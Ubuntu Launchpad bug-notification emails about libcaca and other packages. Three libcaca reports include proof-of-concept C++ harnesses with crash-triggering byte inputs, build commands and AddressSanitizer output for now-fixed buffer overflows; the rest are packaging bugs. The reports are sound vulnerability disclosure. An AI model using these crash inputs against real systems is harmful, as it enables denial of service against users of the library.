[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
was solved in 0.99.beta20-1 ** Changed in: libcaca (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925468 Title: stack-buffer-overflow of import.c in function _import_bin Status in libcaca: Fix Released Status in libcaca package in Ubuntu: Fix Released Bug description: Hello ubuntu security team issues:https://github.com/cacalabs/libcaca/issues/56 System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"bin"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: = ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3817476==ABORTING Thanks To manage notifications about this bug go to:
[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi
was solved in 0.99.beta20-1 ** Changed in: libcaca (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925467 Title: stack-buffer-overflow of text.c in function _import_ansi Status in libcaca: Fix Released Status in libcaca package in Ubuntu: Fix Released Bug description: Hello ubuntu security team issues: https://github.com/cacalabs/libcaca/issues/55 System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_ansi.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"ansi"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_ansi.cc clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi 5.Run poc_ansi asan info: = ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8 READ of size 1 at 0x7ffda0164bea thread T0 #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi Shadow bytes around the buggy address: 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3 0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3763372==ABORTING Thanks To manage notifications about this bug go to:
[Touch-packages] [Bug 1229282] Re: libcaca ftbfs in saucy (pdftex errors)
** Changed in: libcaca (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1229282 Title: libcaca ftbfs in saucy (pdftex errors) Status in libcaca package in Ubuntu: Fix Released Status in libcaca package in Debian: Fix Released Bug description: ! Missing number, treated as zero. \relax l.9 \- \_\-\-\_\-extern char const $\ast$const $\ast$ \hyperlink{group__caca_... A number should have been here; I inserted `0'. (If you can't figure out why I needed to see a number, look up `weird error' in the index to The TeXbook.) ! Illegal unit of measure (pt inserted). \relax l.9 \- \_\-\-\_\-extern char const $\ast$const $\astmake[3]: *** [stamp-latex] Er ror 1 make[3]: Leaving directory `/build/buildd/libcaca-0.99.beta18/doc' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/build/buildd/libcaca-0.99.beta18' make[1]: *** [all] Error 2 make[1]: Leaving directory `/build/buildd/libcaca-0.99.beta18' make: *** [build-arch-stamp] Error 2 dpkg-buildpackage: error: debian/rules build gave error exit status 2 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1229282/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: Fix Released Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF
[Touch-packages] [Bug 1789022] Re: libcaca0 still depends on old libncursesw5 and libtinfo5
** Changed in: libcaca (Ubuntu) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1789022 Title: libcaca0 still depends on old libncursesw5 and libtinfo5 Status in libcaca package in Ubuntu: Fix Released Bug description: Ubuntu Cosmic switched some time ago from ncurses5 to ncurses6. However, the package libcaca0 still depends on old libncursesw5 and libtinfo5 instead of libncursesw6 and libtinfo6. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1789022/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1910391] [NEW] Lightdm is not working on minimal DE install without recommends
Public bug reported: I tried to install Focal with minimal DE without install recommends and installing lightdm. On debian works "out of the box" on ubuntu not, lightdm fails to start. I saw that issue is because missing a greeter, on debian is correctly as dependencies, on ubuntu packages is instead as recommends, moving from recommends to dependens will solve this. ** Affects: lightdm (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lightdm in Ubuntu. https://bugs.launchpad.net/bugs/1910391 Title: Lightdm is not working on minimal DE install without recommends Status in lightdm package in Ubuntu: New Bug description: I tried to install Focal with minimal DE without install recommends and installing lightdm. On debian works "out of the box" on ubuntu not, lightdm fails to start. I saw that issue is because missing a greeter, on debian is correctly as dependencies, on ubuntu packages is instead as recommends, moving from recommends to dependens will solve this. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1910391/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1320422] Re: Please merge dbus 1.8.2-1 (main) from Debian testing (main)
Update dbus should solves also latest cjs fail to build. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1320422 Title: Please merge dbus 1.8.2-1 (main) from Debian testing (main) Status in “dbus” package in Ubuntu: In Progress Bug description: I'm working on a debdiff to resync our dbus package with the current version in Debian testing. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1320422/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp